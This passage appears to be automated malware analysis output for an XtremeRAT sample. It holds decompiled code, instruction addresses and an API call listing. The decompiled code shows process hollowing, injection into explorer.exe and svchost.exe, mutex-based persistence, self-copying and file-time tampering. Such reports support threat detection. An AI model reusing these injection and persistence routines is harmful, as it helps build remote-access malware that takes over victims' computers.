							 *0xc8f8ac = E00C83EA8(_t237, 0xc91f1c, _t486);
						}
					} else {
						 *0xc8f8ac = 0;
					}
					_t484 = 0;
					 *0xc8f8a8 = 0;
					_t509 =  *0xc8f2b0;
					if( *0xc8f2b0 != 0) {
						_t348 =  *0xc8f898; // 0xc30000
						_t476 = E00C833A8(E00C83420(0, _t348, 0), 0xc8a704, _t509);
						if(E00C83960(_t348, E00C82E48(_t348), _t476) == 0) {
							SetFileAttributesW(_t476, 0x80);
							_t511 = E00C82E48(_t476) + _t219;
							E00C82914(0xc91d10, _t476);
							E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t476) + _t219), 0xc91f1c, _t486), 0xc91d10, E00C897F4);
						}
					}
					_t143 = E00C833A8(E00C836D8(0xc918fc, _t511), 0xc90fdc, _t511);
					_t427 =  *0xc8b0f0; // 0xc8e01c
					 *_t427 = _t143;
					_t144 =  *0xc8b0f0; // 0xc8e01c
					_t146 = E00C833A8( *_t144, L".xtr", _t511);
					_t429 =  *0xc8b0f0; // 0xc8e01c
					 *_t429 = _t146;
					_t147 =  *0xc8b0f0; // 0xc8e01c
					if(E00C835B0( *_t147) != 0 && E00C87B84(L"local", _t348, _t484) == 1) {
						_t514 =  *0xc8f8ac;
						if( *0xc8f8ac == 0) {
							GetModuleFileNameW(0, "svchost.exe", 0x20a);
							 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t486);
						}
						_t433 =  *0xc8b0e4; // 0xc8e024
						_t190 =  *0xc8b0e8; // 0xc8e020
						E00C82B90( *_t190, _t348, L"XTREME",  *_t433 - 0x1e, _t476, _t484, _t514);
						E00C82E14( &_v6216, L"XTREME", 0, GetCurrentProcessId(), 0);
						E00C81D10( &_v6212, _v6216, L"SOFTWARE\\", _t514);
						E00C82F90(0x80000001, E00C81CF4(_v6212), _t514, 2, "DSma9HnKa");
						_t202 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t202);
						_t204 =  *0xc8b0e8; // 0xc8e020
						_t429 = 0;
						E00C84600( *_t204, 0xc8f8ac, 0, 0, 0xc91f1c);
						Sleep(0x3e8);
						ExitProcess(0);
					}
					_t516 =  *0xc8f8ac;
					if( *0xc8f8ac != 0) {
						_t150 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t150);
						while(1) {
							_t430 = E00C88BC0;
							_t152 =  *0xc8f8ac; // 0x17c
							 *0xc8f8a8 = E00C83CE4(_t152, 0xc8fccc, E00C88BC0);
							Sleep(0x1f4); // executed
							__eflags =  *0xc8f8a8;
							if( *0xc8f8a8 == 0) {
								_t177 =  *0xc8b0e0; // 0xc8b000
								_t179 =  *0xc8f8ac; // 0x17c
								TerminateProcess(_t179,  *_t177);
								_t430 = 0xc91f1c;
								_t181 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t181, 0xc91f1c, _t486);
							}
							_t484 = _t484 + 1;
							_t154 = E00C8263C(0, 0, "DSma9HnKa"); // executed
							_t477 = _t154;
							_t155 = GetLastError();
							__eflags = _t155 - 0xb7;
							_t348 = _t348 & 0xffffff00 | _t155 == 0x000000b7;
							CloseHandle(_t154);
							__eflags = _t348;
							if(_t348 == 0) {
								_t171 =  *0xc8b0e0; // 0xc8b000
								_t173 =  *0xc8f8ac; // 0x17c
								TerminateProcess(_t173,  *_t171);
								_t430 = 0xc91f1c;
								_t175 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t175, 0xc91f1c, _t486);
							}
							__eflags = _t484 - 7;
							if(_t484 >= 7) {
								break;
							}
							__eflags = _t348 - 1;
							if(_t348 != 1) {
								continue;
							}
							break;
						}
						E00C840F8(0xc8e07c, _t348, _t430, _t477, _t484); // executed
						__eflags =  *0xc8f8a8;
						if(__eflags == 0) {
							_t166 =  *0xc8b0e0; // 0xc8b000
							_t168 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t168,  *_t166);
							E00C88BC0(_t348, _t477, _t484, __eflags, 0xc8fccc);
						}
						__eflags = _t484 - 7;
						if(_t484 >= 7) {
							__eflags = _t348;
							if(_t348 == 0) {
								_t164 =  *0xc8f898; // 0xc30000
								ShellExecuteW(0, L"open", _t164, 0, 0, 0);
							}
						}
						goto L60;
					} else {
						_t183 =  *0xc8f8b0; // 0xd8
						CloseHandle(_t183);
						E00C840F8(0xc8e07c, _t348, _t429, _t476, _t484);
						E00C88BC0(_t348, _t476, _t484, _t516, 0xc8fccc);
						L60:
						_pop(_t431);
						 *[fs:eax] = _t431;
						_push(0xc8a632);
						E00C81B90( &_v6216, 5);
						return E00C81B78( &_v24);
					}
				} else {
					do {
						Sleep(0x3e8);
						_t482 = _t482 - 1;
						_t502 = _t482;
					} while (_t482 > 0);
					goto L15;
				}
			}

0x00c89aee
0x00c89aee
0x00c89af0
0x00c89af2
0x00c89af4
0x00c89af5
0x00c89afd
0x00c89b02
0x00c89b06
0x00c89b0a
0x00c89b0e
0x00c89b12
0x00c89b16
0x00c89b1a
0x00c89b1e
0x00c89b22
0x00c89b26
0x00c89b2a
0x00c89b2e
0x00c89b32
0x00c89b36
0x00c89b3a
0x00c89b3e
0x00c89b42
0x00c89b46
0x00c89b4a
0x00c89b4e
0x00c89b52
0x00c89b56
0x00c89b5a
0x00c89b5e
0x00c89b62
0x00c89b66
0x00c89b6a
0x00c89b6e
0x00c89b72
0x00c89b76
0x00c89b7a
0x00c89b7e
0x00c89b82
0x00c89b86
0x00c89b8a
0x00c89b92
0x00c89b96
0x00c89b9a
0x00c89b9e
0x00c89ba2
0x00c89ba5
0x00c89bad
0x00c89bae
0x00c89bb4
0x00c89bb5
0x00c89bb6
0x00c89bb9
0x00c89bbf
0x00c89bc5
0x00c89bcb
0x00c89bd1
0x00c89bd7
0x00c89bdf
0x00c89be6
0x00c89be7
0x00c89bec
0x00c89bef
0x00c89bf7
0x00c89bfc
0x00c89c01
0x00c89c09
0x00c89c10
0x00c89c24
0x00c89c2c
0x00c89c32
0x00c89c37
0x00c89c4e
0x00c89c55
0x00c89c55
0x00c89c63
0x00c89c68
0x00c89c6a
0x00c89c6f
0x00c89c74
0x00c89c7b
0x00c89c7b
0x00c89c81
0x00c89c90
0x00c89c9d
0x00c89ca2
0x00c89cb2
0x00c89cb2
0x00c89cb2
0x00c89cc3
0x00c89cd2
0x00c89ce6
0x00c89cea
0x00c89cef
0x00c89cf1
0x00c89d3c
0x00c89cf3
0x00c89d0d
0x00c89d0d
0x00c89d40
0x00c89d45
0x00c89d47
0x00c89d53
0x00c89d64
0x00c89d6a
0x00c89d72
0x00c89d7c
0x00c89d82
0x00c89d87
0x00c89d96
0x00c89da5
0x00c89dab
0x00c89dba
0x00c89dc2
0x00c89dc8
0x00c89dd7
0x00c89de4
0x00c89de9
0x00c89df9
0x00c89df9
0x00c89df9
0x00c89e0a
0x00c89e0a
0x00c89dba
0x00c89e15
0x00c89e1b
0x00c89e2a
0x00c89e39
0x00c89e3e
0x00c89e4d
0x00c89e52
0x00c89e5e
0x00c89e66
0x00c89e6d
0x00c89e7b
0x00c89e80
0x00c89e8f
0x00c89e93
0x00c89e93
0x00c89e98
0x00c89ea0
0x00c89eb1
0x00c89eb9
0x00c89ec4
0x00c89ed4
0x00c89ede
0x00c89ef9
0x00c89f05
0x00c89f11
0x00c89f18
0x00c89f18
0x00c89f24
0x00c89f26
0x00c89f2b
0x00c89f2d
0x00c89f34
0x00c89f34
0x00c89f2d
0x00c89f45
0x00c89f54
0x00c89f59
0x00c89f62
0x00c89f73
0x00c89f78
0x00c89f7f
0x00c89f8a
0x00c89f90
0x00c89f9a
0x00c89fa5
0x00c89faa
0x00c89fb1
0x00c89fb2
0x00c89fb7
0x00c89fba
0x00c89fc8
0x00c89fd4
0x00c89fe0
0x00c89fec
0x00c89ff8
0x00c89ffe
0x00c8a00a
0x00c8a00f
0x00c8a010
0x00c8a017
0x00c8a01a
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a082
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a
0x00c89ea2
0x00c89ea2
0x00c89ea7
0x00c89eac
0x00c89ead
0x00c89ead
0x00000000
0x00c89ea2

APIs

Part of subcall function 00C82504: GetModuleHandleA.KERNEL32(00000000,?,00C89BE4), ref: 00C82510

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

SetErrorMode.KERNEL32(00008007,00000000,00C8A62B), ref: 00C89C09
Sleep.KERNEL32(00000064,00008007,00000000,00C8A62B), ref: 00C89C10

Part of subcall function 00C83420: VirtualAlloc.KERNEL32(00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C83450
Part of subcall function 00C83420: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000104,00001000,00000004,00000000,00C83498,?,?,?,?,?,00C89C1F,00000064), ref: 00C83463
Part of subcall function 00C83420: GetCommandLineW.KERNEL32(00000000,00C83498,?,?,?,?,?,00C89C1F,00000064,00008007,00000000,00C8A62B), ref: 00C8346A

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C89C4E
ExitProcess.KERNEL32(00000000,00000064,00008007,00000000,00C8A62B), ref: 00C89C55

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C6A
Sleep.KERNEL32(00001770,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89C7B
CloseHandle.KERNEL32(00000000), ref: 00C89C81

Part of subcall function 00C83FDC: FindResourceW.KERNEL32(00C80000,00000000,0000000A), ref: 00C83FF3
Part of subcall function 00C83FDC: SizeofResource.KERNEL32(00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84001
Part of subcall function 00C83FDC: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C8400F
Part of subcall function 00C83FDC: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C84017
Part of subcall function 00C83FDC: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00000000,?,?,00C89CA2,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C8402B

SHDeleteKeyW.SHLWAPI(80000001,SOFTWARE\XtremeRAT), ref: 00C89CD2

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89D53

Part of subcall function 00C835DC: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
Part of subcall function 00C835DC: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
Part of subcall function 00C835DC: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
Part of subcall function 00C835DC: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
Part of subcall function 00C835DC: ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
Part of subcall function 00C835DC: CloseHandle.KERNEL32(00000000), ref: 00C83660

SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC2
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89DC8
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E15
DeleteFileW.KERNEL32(00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E1B

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00C80000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

GetLastError.KERNEL32(00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E85
ExitProcess.KERNEL32(00000000,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89E93
Sleep.KERNEL32(000003E8,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C89EA7

Part of subcall function 00C89790: GetLocalTime.KERNEL32 ref: 00C89797
Part of subcall function 00C89790: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,5/3/2018 10:11:44 AM,000000FF), ref: 00C897B0
Part of subcall function 00C89790: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C897E0

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE), ref: 00C89F45

Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00C84A79
Part of subcall function 00C84914: CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84A8F
Part of subcall function 00C84914: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000080), ref: 00C84B11
Part of subcall function 00C84914: CopyFileW.KERNEL32(svchost.exe,00000000,00000000), ref: 00C84B27

SetFileAttributesW.KERNEL32(00C30000,00000080,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C89F90
SetFileAttributesW.KERNEL32(00000000,00000080,00C30000,00000080,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C89FA5

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,019A0000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?), ref: 00C84809
Part of subcall function 00C84600: VirtualProtectEx.KERNEL32(?,?,?,00000040,?,?,?,?), ref: 00C8482C
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004,?), ref: 00C84854
Part of subcall function 00C84600: SetThreadContext.KERNEL32(?,?), ref: 00C84885
Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,000000D8,00000000,00000000,00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(000000D8), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(0000017C,00000000,00000000,00000000,00000000,DSma9HnKa,000001F4,000000D8,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

